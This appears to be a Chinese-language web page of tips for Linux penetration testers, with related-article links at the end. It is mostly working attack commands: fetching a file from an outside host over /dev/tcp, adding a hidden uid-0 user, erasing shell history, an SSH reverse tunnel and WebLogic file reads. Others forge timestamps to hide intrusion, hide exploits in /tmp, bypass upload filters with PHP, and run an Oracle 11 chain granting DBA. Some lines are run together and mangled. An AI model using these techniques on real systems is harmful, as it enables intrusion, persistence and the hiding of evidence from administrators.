送给Linux渗透爱好者的小技巧

1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0 " >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户
useradd -o -u 0 cnbird3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost   -p 44即可5.weblogic本地读取文件漏洞
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management6.apache查看虚拟web目录
./httpd -t -D DUMP_VHOSTS7.cvs渗透技巧
CVSROOT/passwd   UNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries     更新的文件和目录内容
CVS/Repository8.Cpanel路径泄露
/3rdparty/squirrelmail/functions/plugin.php9.修改上传文件时间戳（掩盖入侵痕迹）
touch -r 老文件时间戳新文件时间戳10.利用baidu和google搜索目标主机webshell
intitle:PHPJackal 1t1t11.包总补充
创建临时“隐藏”目录 mkdir /tmp/...
/tmp/...目录在管理员有宿醉的情况下是“隐藏”的，可以临时放点exp啥的12.利用linux输出绕过gif限制的图片
printf "GIF89ax01x00x01x00<？php phpinfo（）;？>" > poc.php13.读取环境变量对于查找信息非常有帮助
/proc/self/environ14.最新的Oracle 11提升用户权限（只要session权限）
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS判断登陆权限
select * from session_privs;
Create SESSIONselect * from session_roles;select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = "GREMLIN（用户名）";DESC JAVA$POLICY$DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS Select "GRANT" USER（）, "SYS", "java.io.FilePermission", "<<ALL FILES>>", "execute", "ENABLE" FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS（POL）;
END;
/connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = "用户";connect 普通用户
set serveroutput on
exec dbms_java.set_output（10000）;Select DBMS_JAVA.SET_OUTPUT_TO_JAVA（"ID", "oracle/aurora/rdbms/DbmsJava", "SYS", "writeOutputToFile", "TEXT", NULL, NULL, NULL, NULL,0,1,1,1,1,0, "DECLARE PRAGMA AUTONOMOUS_TRANSACTION;"BEGIN EXECUTE IMMEDIATE ""GRANT DBA TO 用户""; END;", "BEGIN NULL; END;"） FROM DUAL;EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS（"NO_SUCH_SUBSCRIPTION", SYSDATE（））;set role dba;select * from session_privs;EXEC SYS.VULNPROC（"FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL（"ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE（:1）;END;","TEXT"）||"BAR"）;Select DBMS_JAVA.RUNJAVA（"oracle/aurora/util/Test"） FROM DUAL;
SET ROLE DBA;15. webLogic渗透技巧
四. Weblogin Script Tool（WLST）写入到<Domain_home>\config\config.xml1.进行修改:
<bea_home>wlserver_10.0serverinsetWLSenv.sh
2.启动WLST 【ＬＩＮＵＸ公社 www.LinuxIDC.com 】
java weblogic.WLSTwls:/offline> connect（"admin", "admin", "t3://127.0.0.1:7001"）
wls:/bbk/serverConfig> help（）wls:/bbk/serverConfig> edit（）
wls:/bbk/serverConfig> cd（"Servers"）
wls:/bbk/serverConfig/Server-cnbird> cd（"Log"）
wls:/bbk/serverConfig/Server-cnbird/log> cd（"Server-cnbird"）
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit（）
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird ！> set（"FileCount", "4"）
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird ！> save（）
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird ！> activate（）提交对应Active Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird ！> disconnect（）
wls:/offline> exit（）3.批处理:
保存以上命令为cnbird.py
connect（"admin", "admin", "t3://127.0.0.1:7001"）
cd（"Servers"）
cd（"Log"）
cd（"Server-cnbird"）
startEdit（）
set（"FileCount", "4"）
save（）
然后执行java weblogic.WLST cnbird.py在Ubuntu 10.10中安装Google Earth 6[多图]嵌入式Linux 修改启动LOGO相关资讯 Linux教程

Linux教程：如何在命令行中查看目（07/28/2014 12:22:23）
Linux 修改root密码（11/03/2012 07:53:38）
su - root 与su root的区别（06/06/2012 00:39:40）

Linux进程间通信：消息队列（01/28/2013 09:43:00）
U盘安装Linux开机无法启动解决方法（10/07/2012 08:55:52）
Windows 7/Linux 同步时间（05/15/2012 06:17:55）

本文评论查看全部评论（0）